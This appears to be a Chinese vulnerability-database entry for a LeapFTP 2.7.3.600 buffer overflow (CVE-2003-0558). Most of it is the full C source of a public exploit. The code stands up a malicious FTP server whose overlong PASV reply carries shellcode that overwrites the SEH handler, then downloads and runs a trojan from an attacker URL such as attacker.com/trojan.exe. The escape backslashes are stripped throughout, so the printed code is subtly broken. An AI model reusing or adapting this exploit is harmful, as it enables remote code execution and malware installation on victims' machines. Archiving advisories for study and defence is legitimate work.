LeapFTP缓冲区溢出漏洞

漏洞ID	1107413	漏洞类型	缓冲区溢出
发布时间	2003-07-12	更新时间	2003-08-18
CVE编号	CVE-2003-0558	CNNVD-ID	CNNVD-200308-079
漏洞平台	Windows	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/54
https://www.securityfocus.com/bid/82766
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-079

|漏洞详情

LeapFTP2.7.3.600版本存在缓冲区溢出漏洞。远程FTP服务器可以借助到PASV请求的超长IP地址响应执行任意代码。

|漏洞EXP

/*
,----------------------------------------------------
;     LeapFTP remote buffer overflow exploit     
;              by drG4njubas \ DWC Group
`----------------------------------------------------
,----------------------------------------------------
;This exploit works against LeapFTP 2.7.3.600
;running on windows 2000 SP3 russian edition.
;Technical details: When LeapFTP requests IP 
;and port by using PASV command if pasv mode 
;is enabled, it causes the buffer overflow on
;the stack area if server's reply for this 
;PASV request has a long IP address: 
;227 (AAAAAAAAA...(1057 bytes)... ,1,1,1,1,1)
;And this buffer overflow can overwrite a 
;Structured Exception Handler on the stack 
;area with an arbitrary value by specifying 
;the address data over 1057 bytes. If this 
;reply contains 0x29 and 0x2E bytes, an 
;exception occurs before Structured Exception
;Handler is overvritten and program continues
;it's normal work. Thanks a lot to RaiSe for 
;his wonderful shellcode.
`----------------------------------------------------
*/

#include<winsock.h>
#include<stdio.h>

void main(int argc, char *argv[]){

printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n");
printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;n");
printf("; Coded by drG4njubas \\ DWC Security Group ;n");
printf("; www.dwcgr0up.net ;n");
printf("'''''''''''''''''''''''''''''''''''''''''''''''''''n");

if(argc < 3){
printf("USAGE : dwclft273.exe <port> <trojan url>n");
printf("EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exen");
return;
}

char exploit[] =
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90xEBx30x5FxFCx8BxF7x80"
"x3Fx08x75x03x80x37x08x47x80x3Fx01x75xF2x8BxE6x33xD2xB2x04xC1"
"xE2x08x2BxE2x8BxECx33xD2xB2x03xC1xE2x08x2BxE2x54x5AxB2x7Cx8B"
"xE2xEBx02xEBx57x89x75xFCx33xC0xB4x40xC1xE0x08x89x45xF8x8Bx40"
"x3Cx03x45xF8x8Dx40x7Ex8Bx40x02x03x45xF8x8BxF8x8Bx7Fx0Cx03x7D"
"xF8x81x3Fx4Bx45x52x4Ex74x07x83xC0x14x8BxF8xEBxEBx50x8BxF8x33"
"xC9x33xC0xB1x10x8Bx17x03x55xF8x52xEBx03x57x8BxD7x80x7Ax03x80"
"x74x16x8Bx32x03x75xF8x83xC6x02xEBx02xEBx7Ex8Bx7DxFCx51xF3xA6"
"x59x5Fx74x06x40x83xC7x04xEBxDBx5Fx8Bx7Fx10x03x7DxF8xC1xE0x02"
"x03xF8x8Bx07x8Bx5DxFCx8Dx5Bx11x53xFFxD0x89x45xF4x8Bx40x3Cx03"
"x45xF4x8Bx70x78x03x75xF4x8Dx76x1CxADx03x45xF4x89x45xF0xADx03"
"x45xF4x89x45xECxADx03x45xF4x89x45xE8x8Bx55xECx8Bx75xFCx8Dx76"
"x1Ex33xDBx33xC9xB1x0Fx8Bx3Ax03x7DxF4x56x51xF3xA6x59x5Ex74x06"
"x43x8Dx52x04xEBxEDxD1xE3x8Bx75xE8x03xF3x33xC9x66x8Bx0ExEBx02"
"xEBx7DxC1xE1x02x03x4DxF0x8Bx09x03x4DxF4x89x4DxE4x8Bx5DxFCx8D"
"x5Bx2Dx33xC9xB1x07x8Dx7DxE0x53x51x53x8Bx55xF4x52x8Bx45xE4xFC"
"xFFxD0x59x5BxFDxABx8Dx64x24xF8x38x2Bx74x03x43xEBxF9x43xE2xE1"
"x8Bx45xE0x53xFCxFFxD0xFDxABx33xC9xB1x04x8Dx5Bx0CxFCx53x51x53"
"x8Bx55xC4x52x8Bx45xE4xFFxD0x59x5BxFDxABx38x2Bx74x03x43xEBxF9"
"x43xE2xE5xFCx33xD2xB6x1FxC1xE2x08x52x33xD2x52x8Bx45xD4xFFxD0"
"x89x45xB0x33xD2xEBx02xEBx77x52x52x52x52x53x8Bx45xC0xFFxD0x8D"
"x5Bx03x89x45xACx33xD2x52xB6x80xC1xE2x10x52x33xD2x52x52x8Dx7B"
"x09x57x50x8Bx45xBCxFFxD0x89x45xA8x8Dx55xA0x52x33xD2xB6x1FxC1"
"xE2x08x52x8Bx4DxB0x51x50x8Bx45xB8xFFxD0x8Bx4DxA8x51x8Bx45xB4"
"xFFxD0x8Bx4DxACx51x8Bx45xB4xFFxD0x33xD2x52x53x8Bx45xDCxFFxD0"
"x89x45xA4x8Bx7DxA0x57x8Bx55xB0x52x50x8Bx45xD8xFFxD0x8Bx55xA4"
"x52x8Bx45xD0xFFxD0xEBx02xEBx12x33xD2x90x52x53x8Bx45xCCxFFxD0"
"x33xD2x52x8Bx45xC8xFFxD0xE8xE6xFDxFFxFFx47x65x74x4Dx6Fx64x75"
"x6Cx65x48x61x6Ex64x6Cx65x41x08x6Bx65x72x6Ex65x6Cx33x32x2dx64"
"x6Cx6Cx08x47x65x74x50x72x6Fx63x41x64x64x72x65x73x73x08x4Cx6F"
"x61x64x4Cx69x62x72x61x72x79x41x08x5Fx6Cx63x72x65x61x74x08x5F"
"x6Cx77x72x69x74x65x08x47x6Cx6Fx62x61x6Cx41x6Cx6Cx6Fx63x08x5F"
"x6Cx63x6Cx6Fx73x65x08x57x69x6Ex45x78x65x63x08x45x78x69x74x50"
"x72x6Fx63x65x73x73x08x77x69x6Ex69x6Ex65x74x2dx64x6Cx6Cx08x49"
"x6Ex74x65x72x6Ex65x74x4Fx70x65x6Ex41x08x49x6Ex74x65x72x6Ex65"
"x74x4Fx70x65x6Ex55x72x6Cx41x08x49x6Ex74x65x72x6Ex65x74x52x65"
"x61x64x46x69x6Cx65x08x49x6Ex74x65x72x6Ex65x74x43x6Cx6Fx73x65"
"x48x61x6Ex64x6Cx65x08x4Ex53x08x6Ex73x73x63x2dx65x78x65x08x68"
"x74x74x70x3Ax93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93"
"x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93"
"x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93"
"x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93x93"
"x93x93x93x93x93x93x93x93x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x25x49xE1"
"x77x90x90x90x90xFEx83x75xFExFFxFFxFEx83xD5xFExFFxFFxFEx83x25"
"xFFxFFxFFx90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x80xABx2FxFFxFFxFFx03x80xABx30xFFxFFxFFx03x80xABx31xFFxFFxFF"
"x03x80xABx32xFFxFFxFFx03x80xABx33xFFxFFxFFx03x80xABx34xFFxFF"
"xFFx03x80xABx35xFFxFFxFFx03x80xABx36xFFxFFxFFx03x80xABx37xFF"
"xFFxFFx03x80xABx38xFFxFFxFFx03x80xABx39xFFxFFxFFx03x80xABx3A"
"xFFxFFxFFx03x80xABx3BxFFxFFxFFx03x80xABx3CxFFxFFxFFx03x80xAB"
"x3DxFFxFFxFFx03x80xABx3ExFFxFFxFFx03x80xABx3FxFFxFFxFFx03x80"
"xABx40xFFxFFxFFx03x80xABx41xFFxFFxFFx03x80xABx42xFFxFFxFFx03"
"x80xABx43xFFxFFxFFx03x80xABx44xFFxFFxFFx03x80xABx45xFFxFFxFF"
"x03x80xABx46xFFxFFxFFx03x80xABx47xFFxFFxFFx03x80xABx48xFFxFF"
"xFFx03x80xABx49xFFxFFxFFx03x80xABx4AxFFxFFxFFx03x80xABx4BxFF"
"xFFxFFx03x80xABx4CxFFxFFxFFx03x80xABx4DxFFxFFxFFx03x80xABx4E"
"xFFxFFxFFx03x80xABx4FxFFxFFxFFx03x80xABx50xFFxFFxFFx03x80xAB"
"x51xFFxFFxFFx03x80xABx52xFFxFFxFFx03x80xABx53xFFxFFxFFx03x80"
"xABx54xFFxFFxFFx03x80xABx55xFFxFFxFFx03x80xABx56xFFxFFxFFx03"
"x80xABx57xFFxFFxFFx03x80xABx58xFFxFFxFFx03x80xABx59xFFxFFxFF"
"x03x80xABx5AxFFxFFxFFx03x80xABx5BxFFxFFxFFx03x80xABx5CxFFxFF"
"xFFx03x80xABx5DxFFxFFxFFx03x80xABx5ExFFxFFxFFx03x80xABx5FxFF"
"xFFxFFx03x80xABx60xFFxFFxFFx03x80xABx61xFFxFFxFFx03x80xABx62"
"xFFxFFxFFx03x80xABx63xFFxFFxFFx03x80xABx64xFFxFFxFFx03x80xAB"
"x65xFFxFFxFFx03x80xABx66xFFxFFxFFx03x80xABx67xFFxFFxFFx03x80"
"xABx68xFFxFFxFFx03x80xABx69xFFxFFxFFx03x80xABx6AxFFxFFxFFx03"
"x80xABx6BxFFxFFxFFx03x80xABx6CxFFxFFxFFx03x80xABx6DxFFxFFxFF"
"x03x80xABx6ExFFxFFxFFx03x80xABx6FxFFxFFxFFx03x80xABx70xFFxFF"
"xFFx03x80xABx71xFFxFFxFFx03x80xABx72xFFxFFxFFx03x80xABx73xFF"
"xFFxFFx03x80xABx74xFFxFFxFFx03x80xABx75xFFxFFxFFx03x80xABx76"
"xFFxFFxFFx03x80xABx77xFFxFFxFFx03x80xABx78xFFxFFxFFx03x80xAB"
"x79xFFxFFxFFx03x80xABx7AxFFxFFxFFx03x80xABx7BxFFxFFxFFx03x80"
"xABx7CxFFxFFxFFx03x80xABx7DxFFxFFxFFx03x80xABx7ExFFxFFxFFx03"
"x80xABx7FxFFxFFxFFx03x80x6Bx80x03x80x6Bx81x03x80x6Bx82x03x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xE9x61xF9xFFxFF";

char *url = argv[2];

if(strlen(url)>80){
printf("ERROR: trojan url is too long!n");
return;
}

for(unsigned int i = 5; i < strlen(url); i++){
url[i]+=3;
exploit[839+i] = url[i];
}

exploit[839+i] = 'x0B';
exploit[839+i+1] = 'x04';

WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);

SOCKET listen_Sock = socket(AF_INET,SOCK_STREAM,0);
SOCKADDR_IN addr_Sock;

addr_Sock.sin_family = AF_INET;
addr_Sock.sin_addr.s_addr = htonl(INADDR_ANY);
addr_Sock.sin_port = htons(atoi(argv[1]));

printf("Awaiting for connections...n");

if(bind(listen_Sock,(LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr))) return;
if(listen(listen_Sock, 1))return;
SOCKET victim = accept(listen_Sock,NULL,NULL);
printf("Victim connected...n");

char buffer[2048];
sprintf(buffer, "220 drG4njubas roxx da world...rn");
send(victim, buffer, strlen(buffer), NULL);

while(true){
if(recv(victim, buffer, 2048, NULL)==SOCKET_ERROR)return;
if(strncmp(buffer, "USER", 4)==0){
sprintf(buffer, "%srn", "331 Password required for user.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASS", 4)==0){
sprintf(buffer, "%srn", "230 User logged in.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "SYST", 4)==0){
sprintf(buffer, "%srn", "215 Windows_NT version 5.0");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "REST", 4)==0){
sprintf(buffer, "%srn", "350 Restarting at blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PWD", 3)==0){
sprintf(buffer, "%srn", "257 Current directory was changed.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "TYPE", 4)==0){
sprintf(buffer, "%srn", "200 Type set to blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASV", 4)==0){
printf("PASV command received, sending exploit...");
sprintf(buffer, "227 (%s,1,1,1,1,1)rn", exploit);
send(victim, buffer, strlen(buffer), NULL);
printf("finnished.n");
break;
}
else{
printf("ERROR: Wrong client or pasv mode is not enabled.n");
break;
}

}

closesocket(victim);
closesocket(listen_Sock);
WSACleanup();
}

// milw0rm.com [2003-07-12]

|受影响的产品

LeapWare LeapFTP 2.7.3.600

|参考资料

来源:BUGTRAQ
名称:20030711LeapFTPremotebufferoverflowexploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105795219412333&w;=2

相关推荐: Valve Software Half-Life 1.1 Client – Connection Routine Buffer Overflow (1)

Valve Software Half-Life 1.1 Client – Connection Routine Buffer Overflow (1) 漏洞ID 1054067 漏洞类型发布时间 2003-07-29 更新时间 2003-07-29 CVE…

文章版权归作者所有，未经允许请勿转载。

THE END